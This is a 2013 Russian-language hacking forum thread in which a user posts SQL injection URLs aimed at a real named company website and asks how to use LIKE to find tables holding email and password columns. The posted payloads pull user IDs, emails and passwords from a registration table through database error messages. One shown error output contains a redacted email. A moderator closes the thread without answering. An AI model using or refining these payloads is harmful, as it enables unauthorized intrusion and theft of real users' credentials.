вопрос по mssql inj

Discussion in 'Уязвимости' started by w0rkX, 16 May 2013.

Thread Status:
Not open for further replies.
  1. w0rkX

    w0rkX New Member

    Joined:
    15 May 2013
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Всем привет! подскажите кто знает как правильно составить запрос чтоб работал оператор LIKE в запросе

    я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д

    как получить структуру, колонки и содержимое таблиц я знаю
    но вот с LIKE у меня не получается не могу понять почему

    чтобы было понятнее я хочу рассмотреть на примере
    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD='
    есть инъекция
    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(userid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20as%20nvarchar)%20from%20Piaggio..tbSSORegistration%20where%20userid%3E1)--
    Conversion failed when converting the nvarchar value '[email protected]~???......................' to data type int.

    в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword

    пробую через LIKE вывести имя таблицы в которой есть колонка email
    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )--  
    выводит
    Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.

    пробовал указать базу
    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )--
    пробовал и так
    HTML:
    http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20like%20'%25email%25')--
    подскажите плз кто знает как правильно запрос составить с LIKE
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,773
    Likes Received:
    843
    Reputations:
    857
    Подобные вопросы должны задаваться тут

    Закрыто.
     
    _________________________
Loading...
Thread Status:
Not open for further replies.